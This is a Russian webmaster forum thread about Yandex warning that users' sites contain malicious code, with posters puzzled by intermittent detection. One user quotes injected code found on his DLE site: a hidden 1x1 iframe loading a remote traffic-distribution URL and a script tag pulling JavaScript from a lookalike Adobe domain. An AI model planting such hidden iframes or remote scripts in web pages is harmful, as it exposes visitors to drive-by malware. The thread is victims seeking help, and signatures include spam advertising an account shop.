Яндекс находит вредоносный код

12
S
На сайте с 28.10.2005
304

Сайт покажите

GidrogeN
На сайте с 13.10.2008
39

Суппорт Яндекса ответил, написал даже кусок кода, правда он не вредоносный, я сам его зашифровал, видимо лишь сам факт шифровки и вызвал у него подозрение.

G2
На сайте с 12.01.2008
74
GidrogeN:
Суппорт Яндекса ответил, написал даже кусок кода, правда он не вредоносный, я сам его зашифровал, видимо лишь сам факт шифровки и вызвал у него подозрение.

Могу добавить вот ещё, что многие троянщики ставят непостоянный вредоносный код. Т.е. вылазит не для всех пользователей или в определенное время.

несовсем понял как у вас яндекс палил код на сайте во время очередной переиндексвации или за сутки по несколько раз, то наблюдал код, то говорил что всё ок

Магазин аккаунтов с балансом Litres,DNS,Ozon,Rotapost и еще 50+ других сервисов тут - vk.cc/7QK0Sk
GidrogeN
На сайте с 13.10.2008
39

вот и я понять не могу, кода я не снимал, он все время был, а Яндекс то писал что он есть, а после перепроверки через пару часов, что все ОК, хотя я ничего не менял. Походу система у них не доработанная какая-то

Могу еще добавить, что чем дальше, тем круче. Раньше это происходило раз в сутки по ночам, теперь все чаще и чаще, и днем вот уже и вечером

A
На сайте с 30.04.2010
0

У меня со вчерашней ночи началось и ещё до этого времени непроходит...

Да..Был вредоносный код, Аваст ругался, я его снял но яше как будьто пох....Дальше чтото находит...

Arikatamo добавил 01.05.2010 в 03:32

Arikatamo:
У меня со вчерашней ночи началось и ещё до этого времени непроходит...
Да..Был вредоносный код, Аваст ругался, я его снял но яше как будьто пох....Дальше чтото находит...

В консоле ошибок заметил такое :

javascript:%20document.getElementById('flashplayer').innerHTML='<iframe%20src="http://areidsx.info/tds/in.cgi?3"%20width=1%20height=1%20border=0%20style="visibility:hidden"></iframe>';%20exit();

Проверив Main.tpl и другие файлы на Id=flashplayer откликнулось только :

<div id="flashplayer"></div>

когда удаляю : <script src="http://ftpadobe.info/RunContent.js" type="text/javascript"></script>

Пропадает ошибка в Консоле!!Что за фигня.....

M0
На сайте с 13.03.2010
78
GidrogeN:
Могу еще добавить, что чем дальше, тем круче. Раньше это происходило раз в сутки по ночам, теперь все чаще и чаще, и днем вот уже и вечером

Тоже самое. Движок DLE

ДОРОГО куплю СМИ-сайты и городские порталы (/ru/forum/845126)
GidrogeN
На сайте с 13.10.2008
39

ну вот начинается уже эпидемия, специально позаходил еще на несколько сайтов с той же плашкой в результатах поиска по тем же тематикам, сайты чистые, никаких скриптов и ничего подозрительного...

unDEADego
На сайте с 10.03.2010
70

возможно стоит ссылка на чужой сайт с вирусом, либо видео с другого сайта.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий